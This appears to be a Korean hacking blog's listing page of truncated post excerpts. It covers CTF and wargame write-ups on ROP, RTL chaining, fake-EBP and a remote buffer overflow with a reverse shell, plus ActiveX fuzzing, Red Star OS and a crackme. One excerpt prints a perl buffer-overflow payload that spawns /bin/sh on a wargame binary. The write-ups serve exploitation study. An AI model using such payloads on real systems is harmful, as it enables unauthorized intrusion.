Phantom

개요 이 문제는 ROP 기법을 공부하는 사람들이라면 한 번 쯤 풀어본다는 2013년도 pCTF의 Ropasaurusrex 이다. 이전 흑객이라는 스터디에서 Hackerschool의 문제로 아주 쉬운 ROP를 한적이 있는데 개인적으로 많은 자료들을 인용하고 보고 배우며 삽질은 한 문제이다. 문제 내용 파일을 실행하고 아무거나 입력하면 “WIN”이라는 문자열을 출력하고 종료한다. 너무 짧게 넣었나??무지 많이 넣으니 세그멘테이션 폴트가 뜨고 종료한다. 단순한 BOF문제일까?일단 파일에 대해 알아보자.32bit ELF 바이너리이며이번에 안 사실인데 stripped라고 되어 있다면 main함수는 어셈이 보이지 않을 것이다. 보호기법으로는 NX가 걸려 있다. 그리고 OS환경상 ASLR이 걸려 있다. NX(No E..

FC3에 입성 했다.전의 LOB와는 달리 페도라 코어 3에는 다음 메모리 보호기법이 추가되었다.[환경 요약]Stack Dummy : ODown privileage of bash : ORandom Stack : ORandom Library : XRandom Program Binary Mapped : XASCII Armor : ONon-Executable Stack : ONon-Executable Heap : OStack Carany : XStack Smashing Protector : X 요약하자면 ASLR은 스택에만 걸려 있고, ASCII Armor, NX가 스택과 힙에 걸려 있다.ASLR이란 Address Space Layout Randomization – 프로그램의 메모리영역을 랜덤화 시키는 것이다...

내가 가장 헷갈려하고 아직도 헷갈리는 리모트 문제이다.이번 문제는 리모트 익스플로잇 문제인데. 소스를 분석해보자면 6666번포트를 열고 기다리는 일종의 서버?랄까 데몬이랄까 자세히는 아직 잘 모르겠다. 그저 리슨중인 소켓이라 하자.여기서 취약점은 buffer는 [40]인데 원격으로 받는 입력은 Recv(client_fd, buffer, 256, 0)으로 256만큼 입력받는다. 여기서 BOF가 발생한다.문제는 간단한데 이제…바인드 쉘을 쓸지 리버스 쉘을 쓸지 그리고 설정을 어떻게 해야하는지 너무나 고민이 되었다. 나는 리버스쉘을 사용했다. LHOST는 원격지 호스트(공격자)LPORT는 음..아직 모르겠어서 같은 포트로 설정했다. 그리고 포맷을 파이썬으로 설정하고 generate. 이렇게 페이로드를 짜고....

아 망할 독감 ㅡㅡ 열이 38.9도로 너무 올라가서 일단 페이로드만 올린다 이번은 아주 간단한 remote exploit 이다 리버스쉘을 사용 했으며 코드는 이렇다 from socket import *from struct import pack p = lambda x: struct.pack("

요즘 참 인사개편 때문에 정신이 없는것 같다. 일단 이번 문제는 간단하다 strace 사용법 문제인데 6.2는 0x40015000~0x40016000 사이에 데이터를 받는다 이번에 CTF 챌린지 북에 더 자세한 사용법이 있는데 조금 더 배우고 다시 써볼 생각이다 아직 ltrace strace 를 잘 다룰 줄 모른다 아무튼 스택에 있는건 다 초기화되고 저 곳에값을 받게 되는데 저 부분은 내 기억으로 FC3?에서 stdin의 커스텀스택?맞나? 아무튼 stdin의 공간으로 알고 있다 ret를 그곳으로 입력하여 실행시키면 정상적으로 쉘이 따지게 된다.

아 진짜 정말 죄송합니다 하지만 적당한 공격을 했고 글을 내일 다듬기로 ㅎㅎㅎㅎㅎ 이번 문제는 RTL Chaining 이다 어려울것 없다 FTZ에서 이미 RTL Chaining 로 풀엇기에 자세한 설명은 내일 쓰겠다 긱 함수의 주소를 구해서 DO GYE GUL YUT MO로 체이닝 하여 마지막에 매개변수에 /bin/sh문자열을 넣어 실행한다 ./succubus $(perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "\x90"x4, "\xa8\xfa\xff\xbf", "/bin/sh"') /bin/sh의 위치는 buffer 시작지점으..

아 오늘 정말 바쁘다TeamH4C 캠프 준비, 인사 시즌이라 시청 업무 도중엔 앉아있을시간도없고퇴근하자마자 노는것이 아닌 개인사정.... 오늘하루 ㅎㅎㅎ 양심을 팔아버리겠어 어차피 안올렸던거니까 ㅎㅎㅎ zombie_assassin은 간단하게 FEBP인데 페이로드는 이렇다 Leave를 한번 더 실행해서 늘린 후에 문제 코드에 의해 지워지지않은 SFP부분을 변조하여 버퍼지점으로 이동 시킨 뒤에다시 ret는 esp+4지점의 주소로 이동하여 점프하고 RTL을 사용하여 쉘을 땄다. 이제 내일 아침에 수정작업 들어가야겠다.

.ActiveX의 Control에 있는 BOF취약점을 시연하려 한다. 이것을 따라 하려는데 참 오래 걸렸다. JavaScript 참..싫다 삽질을 참 오래한 것 같다. 하.. 아무튼 이번 글은 XP SP3환경에서 ActiveX를 이용해 Fuzzing으로 취약점을 찾아 공격을 하려한다. 이 글의 본문은 여기를 참조 필요한 목록은 다음과 같다. Windows XP SP3 Visual Studio 2010 + Service Pack(어디서 찾았는지 기억이…VS2010SP1dvd1.iso를 찾으시길..) Internet Explorer 6 (IE6가 없다면 IETester라는 Browser Test Tool 사용) Immunity Debugger(대충 입력하고 다운) & mona.py(첨부) COMRaider,..

북한에서 사용한다는 붉은별 OS 그 버전은 이미 2.0을 지나 3.0까지 지난해 말 익명의 pastebin에서 공개되었다. 해외에는 많은 사람들이 뜯어보기 시작했다고 한다. 아직 국내는 그리 많지 않은 건지 자세히는 모르겠다. 현재는 북한 일반인들만 이 OS를 사용한다는 설도 있다. 처음 봤을 땐 맥OS X인줄 알았다. 맥과 흡사한 이 OS는 Redhat 기반의 리눅스 OS이다. 북한의 윗분은 정작 맥프레를 쓰던데…그거 하나면 밥이몇공기여… 기본적인 기능은 다 있는 것 같다. 그런데 다 한글로 바뀌니…아니 북한언어로 바뀌니 몇몇은 이상하다. 심지어 터미널은 고전형 프로그람 안에 있어서 찾는데 시간이 조금 걸렸다. 레드햇 계열의 리눅스라면 rpm을 사용할 것이고, yum은 repo를 보니 rpm으로 URL..

이번 문제도 이름과 시리얼을 크랙하는 문제로 보인다 비베로 짜였고 비교 함수가 있을 것으로 추측된다. 두개에 BP를 걸고 한번 실행해본다. 조금 아래로 내려보면 이것이 있다. 난 이게 아스키인줄 알고 3일간 삽질했다 무시하고…..그냥 넣으면 되더라 그래서 시리얼을 넣고 실행해보면